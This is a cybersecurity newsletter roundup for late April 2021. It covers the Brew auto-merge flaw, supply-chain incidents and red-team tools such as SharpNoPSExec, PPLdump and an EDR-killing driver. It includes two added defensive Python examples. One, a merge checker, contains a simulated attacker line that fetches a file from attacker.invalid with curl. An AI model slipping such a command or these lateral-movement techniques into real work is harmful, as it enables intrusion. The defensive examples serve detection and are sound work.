Last Week in Security (LWiS) - 2021-04-26

New APIs/syscalls for EDR bypass (@yarden_shafir), UAF browser exploit dev (@33y0re), PowerView replacement [EDD] (@FortyNorthSec), phishing banner defeat (@whynotsecurity), packer teardown (@fumik0_), NANDcromancy (@Atredis), and more!

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-04-19 to 2021-04-26.


  • Ill-advised research on Linux kernel lands computer scientists in hot water. Researchers from the University of Minnesota purposely introduced bugs into the Linux kernel as part of a study on the potential to introduce bugs into open source projects. I'm not sure why this was necessary, as plenty of real bugs are already committed to open source projects, including the Linux kernel, that turn out to be exploitable. Linux maintainers responded, appropriately, by banning any contributions from a University of Minnesota email account. The researchers have issued an open letter to the Linux community, but the damage has been done.
  • Security Incident Disclosure (Brew). Due to the way the Brew project's (package manager) GitHub Actions were configured, it was possible to hide code from the git_diff parser, which tricked the auto-merge action into thinking only the version number had been updated. This would have allowed an attacker to add malicious code to any Brew package without any human review. The issue has been fixed by disabling the auto-merge action, along with other steps including mandatory manual review.
  • Computer security world in mourning over death of Dan Kaminsky, aged 42. A star in the infosec community, Dan most famously worked to fix multiple DNS implementations vulnerable to cache poisoning, gave multiple Black Hat and DEF CON talks, and was generally just a good person. His loss at a young age (due to diabetic ketoacidosis) is a reminder to step away from the keyboard and enjoy life.
  • tmp.0ut Volume 1 is an homage to classic hacker zines packed full of great ELF knowledge.
  • Google Chrome DNS Security Bypass. A Chrome "feature" called Async-DNS performs DNS lookups against Google's DNS servers regardless of how the host is configured, which can sidestep DNS-based defenses or logging. The post also includes ways to disable this on Windows and macOS (add the --disable-async-dns flag to the command line). If you rely on an internal DNS server, blocking outbound UDP 53 at your firewall (leaving your own resolvers their upstream path) is a temporary solution until Google starts using DNS-over-HTTPS for this "feature." Switching to Firefox is a permanent solution.
  • REvil gang tries to extort Apple, threatens to sell stolen blueprints. Two interesting pieces of this story: the stolen blueprints seem to confirm Apple's plans to add more ports and remove the Touch Bar (all power users are happy about this), and the ransom is requested not in Bitcoin but in a much lesser known, privacy-focused cryptocurrency called Monero.
  • Project Jengo Redux: Cloudflare’s Prior Art Search Bounty Returns. Patent trolls are a symptom of a broken patent system, but Cloudflare's response to them is fantastic. A $100,000 bounty to invalidate the patents used by the trolls is a solution that can have a positive outcome for Cloudflare and generate some publicity about this flaw in the patent system.
  • clickstudios Passwordstate Incident Management Advisory #01. Supply chain attacks are here to stay, and what better software to hijack an update for than a password manager? Any critical systems should be protected by FIDO2/U2F hardware tokens, so that a password lifted from a compromised manager is not enough on its own to log in. FIDO2 keys are a one-time investment that can save untold amounts of damage later on.
  • Exploiting vulnerabilities in Cellebrite UFED and Physical Analyzer from an app's perspective. Despite the questionable cryptocurrency moves, Signal proves it still has an edge with this shade-filled post about possibly, maybe, definitely including some Cellebrite parser 0-days on a random selection of Signal users' devices. It will be interesting to see whether this plays out in court, with evidence rejected because it may have been tampered with or deleted by one of these exploits. Is it enough to cast doubt on any user's Signal data collected with Cellebrite?
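The Brew item above comes down to one design point: an auto-merge bot should derive the change from the real before/after file contents, never from a diff string it was handed, and should then allowlist exactly which fields a version bump may touch. The following is an added example of that check; it is not Homebrew's code, does not reproduce the git_diff parsing flaw, and the formula texts, the allowed-field policy and the same-host rule for url are all constructed assumptions for the example.

```python
"""Allowlist check for "version bump only" formula changes (added example)."""
import difflib
import re
from urllib.parse import urlsplit

# Fields a bot-merged version bump may change (assumed policy).
BUMP_FIELD = re.compile(r'^\s*(url|sha256|version)\s+"([^"]*)"\s*$')

# Constructed formula; not a real Homebrew formula.
OLD_FORMULA = """\
class Foo < Formula
  desc "Example tool"
  homepage "https://example.invalid/foo"
  url "https://example.invalid/foo-1.0.0.tar.gz"
  sha256 "aaaa"

  def install
    bin.install "foo"
  end
end
"""

# A legitimate bump: only url and sha256 change.
GOOD_BUMP = OLD_FORMULA.replace("1.0.0", "1.0.1").replace('"aaaa"', '"bbbb"')

# The same bump with a command smuggled into install (simulated attacker PR).
BAD_BUMP = GOOD_BUMP.replace(
    "  def install\n",
    '  def install\n    system "curl", "-fsSL", "https://attacker.invalid/x", "-o", "/tmp/x"\n',
)

# The same bump, but the tarball now comes from a different host.
HOST_SWAP = GOOD_BUMP.replace(
    "https://example.invalid/foo-1.0.1", "https://attacker.invalid/foo-1.0.1"
)


def changed_lines(old: str, new: str):
    """Removed and added lines, computed locally from the full contents
    (zero context lines, so every body line is a '-' or '+' line)."""
    diff = list(difflib.unified_diff(old.splitlines(), new.splitlines(),
                                     lineterm="", n=0))
    removed, added = [], []
    for line in diff[2:]:  # skip the ---/+++ header pair
        if line.startswith("@@"):
            continue
        (removed if line.startswith("-") else added).append(line[1:])
    return removed, added


def is_version_bump_only(old: str, new: str) -> bool:
    """True only if every changed line is an allowed field, each removed
    field is replaced by the same field, and a url change keeps its host."""
    removed, added = changed_lines(old, new)
    if not added or len(removed) != len(added):
        return False  # nothing added, or a line appeared/vanished
    old_fields = [BUMP_FIELD.match(line) for line in removed]
    new_fields = [BUMP_FIELD.match(line) for line in added]
    if not all(old_fields) or not all(new_fields):
        return False  # a touched line is not one of the allowed fields
    old_by_name = {m.group(1): m.group(2) for m in old_fields}
    new_by_name = {m.group(1): m.group(2) for m in new_fields}
    if set(old_by_name) != set(new_by_name) or len(old_by_name) != len(removed):
        return False  # field set differs, or a field was touched twice
    if "url" in old_by_name and (urlsplit(old_by_name["url"]).hostname
                                 != urlsplit(new_by_name["url"]).hostname):
        return False  # download host moved: needs a human
    return True


if __name__ == "__main__":
    for name, text in (("good", GOOD_BUMP), ("bad", BAD_BUMP), ("host", HOST_SWAP)):
        print(name, is_version_bump_only(OLD_FORMULA, text))
```

The host rule matters because a "url" line that passes the field allowlist can still point the download at an attacker's server; in a real bot you would also pin the hosts a formula may fetch from and verify the new sha256 against a download you perform yourself.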


Tools and Exploits

  • CertStealer is a .NET tool for stealing and importing certificates in the Windows certificate store without touching disk. Useful for red team operations where you need to poach a certificate for pivoting purposes and want to do so with an in-memory post-ex payload.
  • SharpNoPSExec is a fileless lateral movement tool that queries all services and randomly picks one with a start type of disabled or manual, a current status of stopped, and LocalSystem privileges, so that it can be reused. Once it selects the service it saves the service's current state, replaces the binary path with the payload of your choice and starts it. After waiting 5 seconds it restores the original service configuration.
  • Meet EDD - He Helps Enumerate Domain Data. EDD is a .NET tool for enumerating Windows domain data, designed as a replacement for the now unmaintained PowerView.
  • PPLdump is a tool that implements a userland exploit, initially discussed by James Forshaw (a.k.a. @tiraniddo) in this blog post, for dumping the memory of any Protected Process Light (PPL) as an administrator.
  • AsIo3Unlock is a proof-of-concept bypass of the pseudo-security caller check implemented in the AsIO3 driver, "unlocking" the driver for use with full R/W access.
  • fakemeeting is a tool for creating fake meeting invites. More details here.
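The SharpNoPSExec technique above leaves a distinctive trace: the service's ImagePath is rewritten to the payload and then rewritten back a few seconds later. The following is an added detection example, not part of that tool or of the original post. It runs over constructed Sysmon Event ID 13 (RegistryEvent, Value Set) records using the field names Sysmon emits; every timestamp, service name and path below is made up, and the 60 second window is an assumed tolerance around the tool's 5 second restore delay.

```python
"""Flag services whose ImagePath is changed and then restored within seconds
(added detection example over constructed Sysmon Event ID 13 records)."""
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)  # assumed; the tool waits ~5 s before restoring

SAMPLE_EVENTS = [  # constructed records in Sysmon's field layout
    {"EventID": 13, "UtcTime": "2021-04-26 10:00:00.000",
     "Image": "C:\\Windows\\System32\\services.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\RemoteRegistry\\ImagePath",
     "Details": "C:\\Windows\\Temp\\svc.exe"},
    {"EventID": 1, "UtcTime": "2021-04-26 10:00:01.000",      # unrelated event type
     "Image": "C:\\Windows\\Temp\\svc.exe"},
    {"EventID": 13, "UtcTime": "2021-04-26 10:00:05.000",     # the restore
     "Image": "C:\\Windows\\System32\\services.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\RemoteRegistry\\ImagePath",
     "Details": "C:\\Windows\\system32\\svchost.exe -k localService -p"},
    {"EventID": 13, "UtcTime": "2021-04-26 10:30:00.000",     # a normal install
     "Image": "C:\\Users\\admin\\Downloads\\setup.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\FooAgent\\ImagePath",
     "Details": "C:\\Program Files\\Foo\\agent.exe"},
    {"EventID": 13, "UtcTime": "2021-04-26 14:30:00.000",     # an upgrade hours later
     "Image": "C:\\Users\\admin\\Downloads\\setup.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\FooAgent\\ImagePath",
     "Details": "C:\\Program Files\\Foo\\agent2.exe"},
]


def parse_time(value: str) -> datetime:
    """Sysmon's UtcTime format: YYYY-MM-DD HH:MM:SS.mmm."""
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S.%f")


def service_from_target(target: str):
    """Service name if target is ...\\Services\\<name>\\ImagePath, else None."""
    parts = target.split("\\")
    if (len(parts) >= 3 and parts[-1].lower() == "imagepath"
            and parts[-3].lower() == "services"):
        return parts[-2]
    return None


def find_transient_imagepath_swaps(events, window=WINDOW):
    """Pairs of consecutive ImagePath writes on one service, with different
    values, closer together than `window`. The first value is the transient
    (likely payload) path."""
    writes = {}
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        svc = service_from_target(ev["TargetObject"])
        if svc is None:
            continue
        writes.setdefault(svc, []).append((parse_time(ev["UtcTime"]), ev["Details"]))
    hits = []
    for svc, entries in writes.items():
        entries.sort()
        for (t1, v1), (t2, v2) in zip(entries, entries[1:]):
            if v1 != v2 and t2 - t1 <= window:
                hits.append({"service": svc, "transient_image": v1,
                             "restored_image": v2,
                             "seconds": (t2 - t1).total_seconds()})
    return hits


if __name__ == "__main__":
    for hit in find_transient_imagepath_swaps(SAMPLE_EVENTS):
        print(hit)
```

Sysmon only logs registry writes that your configuration includes, so the RegistryEvent rules need to cover HKLM\System\CurrentControlSet\Services\*\ImagePath for this to fire; corroborate a hit with the System log's service state changes (Event ID 7036) for the same service in the same window, and treat a transient path under a user-writable or temp directory as high confidence.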

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • STFUEDR. Everyone knows that userland hooks can be defeated, but some EDRs also rely on drivers and kernel hooks. This project uses a driver signing bypass to load its own driver and defeat even those hooks!

This post is cross-posted on SIXGEN's blog.